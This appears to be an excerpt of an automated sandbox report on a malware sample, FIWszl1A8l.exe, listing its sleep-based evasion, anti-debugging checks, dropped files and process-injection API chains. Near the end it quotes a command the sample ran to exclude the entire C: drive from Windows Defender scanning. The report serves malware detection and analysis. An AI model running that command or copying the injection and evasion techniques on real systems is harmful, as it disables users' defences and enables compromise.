                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6610
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3114
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeWindow / User API: threadDelayed 1573
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeWindow / User API: threadDelayed 3541
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeWindow / User API: threadDelayed 3890
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4860
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1599
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6596
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3162
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4017
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2296
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_0-10755
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeDropped PE file which has not been started: C:\Users\user\Downloads\ChromeSetup.exe
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\ChromeSetup[1].exe
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_6-48830
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_6-48829
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 6610 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 3114 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 1664Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 7560Thread sleep count: 307 > 30
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 2604Thread sleep count: 1573 > 30
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 2604Thread sleep time: -1573000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 936Thread sleep count: 3541 > 30
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 936Thread sleep time: -35410s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 2604Thread sleep count: 3890 > 30
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exe TID: 2604Thread sleep time: -3890000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep count: 4860 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028Thread sleep count: 1599 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8060Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8048Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 6596 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8168Thread sleep count: 3162 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7732Thread sleep count: 4017 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 2296 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7672Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep count: 217 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7688Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeThread sleep count: Count: 3541 delay: -10
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeFile Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D080F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW,6_2_02D080F0
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07410 GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,6_2_02D07410
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeThread delayed: delay time: 30000
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.000000000099E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.00000000009D9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0R
                      Source: powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: FIWszl1A8l.exe, 00000000.00000002.1734717265.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: powershell.exe, 0000000D.00000002.1420200807.0000000004776000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: FIWszl1A8l.exe, 00000006.00000002.3783680382.00000000009BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeAPI call chain: ExitProcess graph end nodegraph_6-48418
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_10016A5E
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D1054D VirtualProtect ?,-00000001,00000104,?6_2_02D1054D
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary,6_2_02D07490
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_008D0AE4 mov eax, dword ptr fs:[00000030h]0_2_008D0AE4
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_3_03FA49C9 mov eax, dword ptr fs:[00000030h]6_3_03FA49C9
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00920AE4 mov eax, dword ptr fs:[00000030h]6_2_00920AE4
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_028200CD mov eax, dword ptr fs:[00000030h]6_2_028200CD
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D06790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree,6_2_02D06790
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_10016D55 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_10016D55
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_008E6D2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_008E6D2C
                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeCode function: 0_2_008E6A35 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_008E6A35
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,6_2_02D0DF10
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D0F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_02D0F00A
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D11F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_02D11F67
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00976815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00976815
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_00978587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00978587

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\FIWszl1A8l.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D07E50 _memset,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,VirtualAllocEx,WriteProcessMemory,GetThreadContext,SetThreadContext,ResumeThread,6_2_02D07E50
                      Source: C:\Users\user\AppData\Roaming\FIWszl1A8l.exeCode function: 6_2_02D077E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread,6_2_02D077E0
